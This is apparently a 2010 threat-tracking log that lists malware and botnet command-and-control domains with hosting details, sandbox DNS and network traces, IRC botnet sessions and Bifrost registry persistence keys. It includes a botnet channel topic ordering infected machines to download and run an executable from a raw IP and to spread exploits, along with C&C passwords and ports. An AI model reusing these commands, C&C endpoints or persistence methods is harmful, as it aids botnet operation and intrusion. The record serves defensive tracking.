Month: November 2010

www.myrouji.com(malware hosted with United States Pasadena Cnlink Networks Inc)

– DNS Queries: Name Query Type Query Result Successful Protocol www.myrouji.com DNS_TYPE_A 74.126.183.34 1 – Unknown TCP Traffic: 74.126.183.34:8883 State: Connection established, not terminated – Transferred outbound Bytes: 160 – Transferred inbound Bytes: 22 Data sent: 4768 3073 74a0 0000 00e0 0000 0078 9c4b Gh0st……..x.K 8bf6 669e c3c0 c0c0 0ac4 8c40 acc1 c5c0 ..f……..@…. c004

update2.helohmar.com(buterfly bot hosted with United Kingdom Didjief Internation Kulinari Koncept Llc)

DNS Lookup Host Name IP Address ms.allnewdots.com 208.53.131.135 ircd here PASS laorosr NCIK [N00_USA_XP_2598789].รง@ USER SP3-191 * 0 :EXPERIEN-9DF758 :hub.us.com 001 [N00_USA_XP_2598789]___ :us, [N00_USA_XP_2598789]___!SP3-191@host81-141-83-239.wlms-broadband.com : :hub.us.com 005 [N00_USA_XP_2598789]___ :[N00_USA_XP_2598789]___!SP3-191@host81-141-83-239.wlms-broadband.com JOIN :#dpi :hub.us.com 332 [N00_USA_XP_2598789]___ #dpi :finito :hub.us.com 333 [N00_USA_XP_2598789]___ #dpi la 1291139776 :hub.us.com 353 [N00_USA_XP_2598789]___ @ #dpi :[N00_USA_XP_2598789]___ :hub.us.com 366 [N00_USA_XP_2598789]___ #dpi :End of /NAMES

testusa.helohmar.com(malware hosted with United States Woodstock Fdcservers.net)

DNS Lookup Host Name IP Address testusa.helohmar.com 76.73.36.42 api.ipinfodb.com 67.212.74.82 www.craigslist.org 208.82.236.208 geo.craigslist.org 208.82.236.208 Download URLs http://67.212.74.82/v2/ip_query.php?key=4f7c7d0d524a3e9445217575619159f874a734aa16e97b87fc505f49de8e31a1&output=xml (api.ipinfodb.com) http://208.82.236.208/ (www.craigslist.org) http://208.82.236.208/ (www.craigslist.org) Outgoing connection to remote server: testusa.helohmar.com port 8800 Outgoing connection to remote server: testusa.helohmar.com port 8800 Outgoing connection to remote server: testusa.helohmar.com TCP port 8800 Outgoing connection to remote server: api.ipinfodb.com TCP port

xvm-168-229.ghst.net(Botnet hosted with United Kingdom Gandi Uk Dedicated Hosting Servers)

Remote Host Port Number 217.70.188.30 5900 PASS Virus 92.243.28.194 5900 PASS Virus 95.142.168.229 5900 PASS Virus NICK VirUs-xlaixqgo USER VirUs “” “zbo” : 8Coded 8Ahmed.Ramzey@Hotmail.Com.. NICK VirUs-firqfllm USER VirUs “” “zux” : NICK VirUs-nqcgfvif USER VirUs “” “pcm” : NICK VirUs-whzmmafw USER VirUs “” “kga” : NICK VirUs-rffujwic USER VirUs “” “xvi” : NICK VirUs-ubjkqifu

mydrivers.babypin.net(Botnet hosted with United States Orange Vpls Inc. D/b/a Krypt Technologies)

mydrivers.babypin.net ip: 109.196.130.50 mydrivers.babypin.net ip: 109.196.130.66 mydrivers.babypin.net ip: 98.126.214.82 Remote Host Port Number 112.78.112.208 80 218.85.133.201 80 98.126.214.82 6682 PASS laorosr USER SP2-364 * 0 :COMPUTERNAME MODE [N00_USA_XP_6656961] @ -ix MODE #dpi -ix Master86 changes topic to ‘.asc -S|.http http://208.53.183.181/icsy.exe|.asc exp_all 25 5 0 -a -r -e|.asc exp_all 25 5 0 -b -r -e|.asc exp_all

www.52fa.net(malware hosted with United States Missoula Sharktech Internet Services)

DNS Lookup Host Name IP Address 0 127.0.0.1 www.52fa.net www.52fa.net 204.188.243.34 UDP Connections Remote IP Address: 127.0.0.1 Port: 1033 Send Datagram: 2 packet(s) of size 1 Recv Datagram: 2 packet(s) of size 1 Download URLs http://204.188.243.34/wm1/count.asp?mac=00:0C:F1:85:8C:74&ver=1&os=nothing (www.52fa.net) Outgoing connection to remote server: www.52fa.net TCP port 80 Registry Changes by all processes Create or Open Changes

april2.botsgod.info(VirUs the bigest lamer with big botnet hosted with United Kingdom Gandi Uk Dedicated Hosting Servers)

april2.botsgod.info ip: 92.243.28.194 april2.botsgod.info ip: 95.142.168.229 april2.botsgod.info ip: 217.70.188.30 Remote Host Port Number 217.70.188.30 4949 92.243.28.194 4949 95.142.168.229 4949 NICK {NOVY}[USA][XP-SP2]043406 USER VirUs “” “lol” :0320 NICK [USA][XP-SP2]073489 USER VirUs “” “lol” :7113 USER VirUs “” “lol” :4947 NICK [USA][XP-SP2]725879 USER VirUs “” “lol” :8170 NICK [USA][XP-SP2]710812 USER VirUs “” “lol” :0319 NICK [USA][XP-SP2]250195 USER

medogrgr.no-ip.biz(bifrose hecker from Saudi Arabia Riyadh)

DNS Lookup Host Name IP Address medogrgr.no-ip.biz 188.49.5.146 Outgoing connection to remote server: medogrgr.no-ip.biz TCP port 81 Registry Changes by all processes Create or Open Changes HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{9D71D88C-C598-4935-C5D1-43AA4DB90836} “stubpath” = [REG_EXPAND_SZ, value: C:WINDOWSBifrostserver.exe s] HKEY_LOCAL_MACHINESOFTWAREBifrost “nck” = [REG_BINARY, size: 16 bytes] HKEY_CURRENT_USERSoftwareBifrost “klg” = [REG_BINARY, size: 1 bytes] Reads HKEY_LOCAL_MACHINESOFTWAREMicrosoftAdvanced INF Setup “AdvpackLogFile” HKEY_LOCAL_MACHINESYSTEMControlSet001ControlTerminal